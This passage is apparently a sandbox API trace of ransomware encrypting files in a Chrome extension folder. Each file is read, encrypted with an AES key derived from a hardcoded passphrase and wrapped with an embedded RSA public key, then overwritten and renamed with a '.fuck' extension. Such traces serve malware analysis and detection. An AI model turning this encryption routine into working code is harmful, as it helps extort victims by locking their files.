lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.820] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.820] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.820] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.820] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.820] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.820] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.820] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.820] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.820] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.820] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.820] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.820] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.821] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0xf8, lpOverlapped=0x0) returned 1 [0261.821] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0xf8, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x100) returned 1 [0261.821] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x100, lpOverlapped=0x0) returned 1 [0261.821] CloseHandle (hObject=0x5d50) returned 1 [0261.821] CloseHandle (hObject=0x5d64) returned 1 [0261.821] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\common.js.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\common.js.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\common.js" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\common.js"), bFailIfExists=0) returned 1 [0261.826] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\common.js", dwFileAttributes=0x0) returned 1 [0261.827] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\common.js.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\common.js.gsg")) returned 1 [0261.829] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\common.js" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\common.js"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\common.js.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\common.js.fuck")) returned 1 [0261.830] CryptDestroyHash (hHash=0x2e7fc00) returned 1 [0261.830] CryptDestroyKey (hKey=0x2e7fc40) returned 1 [0261.830] CryptReleaseContext (hProv=0x2e7a500, dwFlags=0x0) returned 1 [0261.830] FindNextFileA (in: hFindFile=0x2e7fbc0, lpFindFileData=0x2b9d480 | out: lpFindFileData=0x2b9d480) returned 1 [0261.830] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9d390 | out: lpSystemTimeAsFileTime=0x2b9d390) [0261.830] GetLastError () returned 0x0 [0261.830] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\feedback.css" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\feedback.css")) returned 0x20 [0261.831] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\feedback.css", dwFileAttributes=0x80) returned 1 [0261.832] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\feedback.css" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\feedback.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0261.833] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\feedback.css.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\feedback.css.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0261.833] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\feedback.css.gsg", dwFileAttributes=0x2) returned 1 [0261.834] CryptAcquireContextA (in: phProv=0x2b9c38c, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9c38c*=0x2e7a500) returned 1 [0261.836] CryptCreateHash (in: hProv=0x2e7a500, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9c390 | out: phHash=0x2b9c390) returned 1 [0261.836] lstrlenA (lpString="sMlycgvlQVZfOQrrHUueZgtAzMlQm") returned 29 [0261.836] CryptHashData (hHash=0x2e7fc00, pbData=0x28cb760, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0261.836] CryptDeriveKey (in: hProv=0x2e7a500, Algid=0x6610, hBaseData=0x2e7fc00, dwFlags=0x1000000, phKey=0x2b9c37c | out: phKey=0x2b9c37c*=0x2e7fc40) returned 1 [0261.836] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9c398, pcbBinary=0x2b9c378, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9c398, pcbBinary=0x2b9c378, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0261.837] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9c398, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9c36c, pcbStructInfo=0x2b9c374 | out: pvStructInfo=0x2b9c36c, pcbStructInfo=0x2b9c374) returned 1 [0261.837] CryptAcquireContextA (in: phProv=0x2b9c388, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9c388*=0x2e721c8) returned 1 [0261.837] CryptImportPublicKeyInfo (in: hCryptProv=0x2e721c8, dwCertEncodingType=0x1, pInfo=0x2eab130*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2eab160*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2eab168*, PublicKey.cUnusedBits=0x0), phKey=0x2b9c380 | out: phKey=0x2b9c380*=0x2e7da40) returned 1 [0261.837] CryptEncrypt (in: hKey=0x2e7da40, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9c370*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9c370*=0x80) returned 1 [0261.837] CryptEncrypt (in: hKey=0x2e7da40, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e72580*, pdwDataLen=0x2b9c384*=0x18, dwBufLen=0x80 | out: pbData=0x2e72580*, pdwDataLen=0x2b9c384*=0x80) returned 1 [0261.837] WriteFile (in: hFile=0x5d50, lpBuffer=0x2e72580*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x2e72580*, lpNumberOfBytesWritten=0x2b9c394*=0x80, lpOverlapped=0x0) returned 1 [0261.838] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.840] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.840] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.843] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.843] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.843] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.843] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.843] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.843] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.843] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x1a6, lpOverlapped=0x0) returned 1 [0261.843] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x1a6, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x1b0) returned 1 [0261.843] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x1b0, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x1b0, lpOverlapped=0x0) returned 1 [0261.844] CloseHandle (hObject=0x5d64) returned 1 [0261.844] CloseHandle (hObject=0x5d50) returned 1 [0261.844] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\feedback.css.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\feedback.css.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\feedback.css" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\feedback.css"), bFailIfExists=0) returned 1 [0261.846] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\feedback.css", dwFileAttributes=0x0) returned 1 [0261.847] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\feedback.css.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\feedback.css.gsg")) returned 1 [0261.848] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\feedback.css" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\feedback.css"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\feedback.css.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\feedback.css.fuck")) returned 1 [0261.849] CryptDestroyHash (hHash=0x2e7fc00) returned 1 [0261.849] CryptDestroyKey (hKey=0x2e7fc40) returned 1 [0261.849] CryptReleaseContext (hProv=0x2e7a500, dwFlags=0x0) returned 1 [0261.849] FindNextFileA (in: hFindFile=0x2e7fbc0, lpFindFileData=0x2b9d480 | out: lpFindFileData=0x2b9d480) returned 1 [0261.849] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9d390 | out: lpSystemTimeAsFileTime=0x2b9d390) [0261.849] GetLastError () returned 0x0 [0261.850] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\feedback.html" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\feedback.html")) returned 0x20 [0261.850] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\feedback.html", dwFileAttributes=0x80) returned 1 [0261.850] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\feedback.html" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\feedback.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0261.851] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\feedback.html.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\feedback.html.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0261.852] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\feedback.html.gsg", dwFileAttributes=0x2) returned 1 [0261.852] CryptAcquireContextA (in: phProv=0x2b9c38c, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9c38c*=0x2e7a500) returned 1 [0261.855] CryptCreateHash (in: hProv=0x2e7a500, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9c390 | out: phHash=0x2b9c390) returned 1 [0261.855] lstrlenA (lpString="sMlycgvlQVZfOQrrHUueZgtAzMlQm") returned 29 [0261.855] CryptHashData (hHash=0x2e7fc00, pbData=0x28cb6c0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0261.855] CryptDeriveKey (in: hProv=0x2e7a500, Algid=0x6610, hBaseData=0x2e7fc00, dwFlags=0x1000000, phKey=0x2b9c37c | out: phKey=0x2b9c37c*=0x2e7fd40) returned 1 [0261.855] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9c398, pcbBinary=0x2b9c378, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9c398, pcbBinary=0x2b9c378, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0261.855] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9c398, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9c36c, pcbStructInfo=0x2b9c374 | out: pvStructInfo=0x2b9c36c, pcbStructInfo=0x2b9c374) returned 1 [0261.855] CryptAcquireContextA (in: phProv=0x2b9c388, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9c388*=0x2e735f8) returned 1 [0261.856] CryptImportPublicKeyInfo (in: hCryptProv=0x2e735f8, dwCertEncodingType=0x1, pInfo=0x2eac990*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2eac9c0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2eac9c8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9c380 | out: phKey=0x2b9c380*=0x2e7de80) returned 1 [0261.856] CryptEncrypt (in: hKey=0x2e7de80, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9c370*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9c370*=0x80) returned 1 [0261.856] CryptEncrypt (in: hKey=0x2e7de80, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e73350*, pdwDataLen=0x2b9c384*=0x18, dwBufLen=0x80 | out: pbData=0x2e73350*, pdwDataLen=0x2b9c384*=0x80) returned 1 [0261.856] WriteFile (in: hFile=0x5d64, lpBuffer=0x2e73350*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x2e73350*, lpNumberOfBytesWritten=0x2b9c394*=0x80, lpOverlapped=0x0) returned 1 [0261.857] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.869] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.869] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.871] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.871] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.872] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.872] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.872] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.872] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.872] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.872] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.872] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.872] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.872] 